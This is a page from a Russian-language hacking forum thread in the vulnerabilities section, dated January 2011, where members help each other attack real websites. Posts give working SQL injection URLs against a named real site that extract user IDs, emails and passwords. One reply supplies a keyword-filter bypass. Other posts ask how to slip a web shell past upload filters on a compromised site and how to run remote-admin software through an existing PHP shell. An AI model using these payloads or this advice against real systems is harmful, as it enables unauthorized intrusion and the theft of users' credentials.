HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16221  
Старый 27.01.2011, 18:09
j-prof
Guest
Сообщений: n/a
Провел на форуме:
122440

Репутация: -4
По умолчанию

privateurl.com

в поле логин

хз как там раскрутить помогите и вообще кривая какаят +--+ не робит а /* робит чо эт знач помогите

кста через union можно ток select выполнять или апдэйт, delete, insert тож
 
Ответить с цитированием

  #16222  
Старый 28.01.2011, 01:12
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Так работает:

Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:

Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
 
Ответить с цитированием

  #16223  
Старый 28.01.2011, 01:50
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

Цитата:
Сообщение от DCrypt  
DCrypt said:
Так работает:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
А так нет:
Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
Почему? =\
Кажется там from фильтруется.
 
Ответить с цитированием

  #16224  
Старый 28.01.2011, 02:27
DCrypt
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
479

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Кажется там from фильтруется.
http://www.exploit-db.com/exploits/16060/

Где?
 
Ответить с цитированием

  #16225  
Старый 28.01.2011, 14:03
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от DCrypt  
DCrypt said:
http://www.exploit-db.com/exploits/16060/
Где?
а при чем тут сама уязвимость, фильтруется на хосте, только не from, а select from, обходится так:

Код:
Code:
http://www.fumasano.es/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT%0a1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
 
Ответить с цитированием

  #16226  
Старый 28.01.2011, 15:04
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
 
Ответить с цитированием

  #16227  
Старый 28.01.2011, 15:25
KandidaT'S
Guest
Сообщений: n/a
Провел на форуме:
20602

Репутация: 0
По умолчанию

поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
 
Ответить с цитированием

  #16228  
Старый 28.01.2011, 23:04
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию

uname -a: Windows NT WINCTRL-7IBNPUN 6.1 build 7600 ((null)) i586

Safe-mode: ON (secure)

C:\ drwxrwxrwx

(это пхп шелл)

Можно как-то запускать радмин или что-то?
 
Ответить с цитированием

  #16229  
Старый 29.01.2011, 01:07
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

Цитата:
Сообщение от KandidaT'S  
KandidaT'S said:
поломал сайтец пришло время заливать шелл на стандартные вещи типо sheel.php.gif не помогают, помогите как бы! Внизу админки был найден корпарайт -> Copyright © 2006 Content-manager
Нереал так подсказать.

В админке есть залив файлов?

Цитата:
Сообщение от noviyuser  
noviyuser said:
подскажите софт или скрипт для быстрого блайнда? а то приходится долго ждать пока идет перебор
Тулза от Пашкелы вроде умеет.
 
Ответить с цитированием

  #16230  
Старый 29.01.2011, 08:26
KandidaT'S
Guest
Сообщений: n/a
Провел на форуме:
20602

Репутация: 0
По умолчанию

заливка фаилов есть я так понел картинки и pdf заливаю sheel.php.pdf пишет неправильное название
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ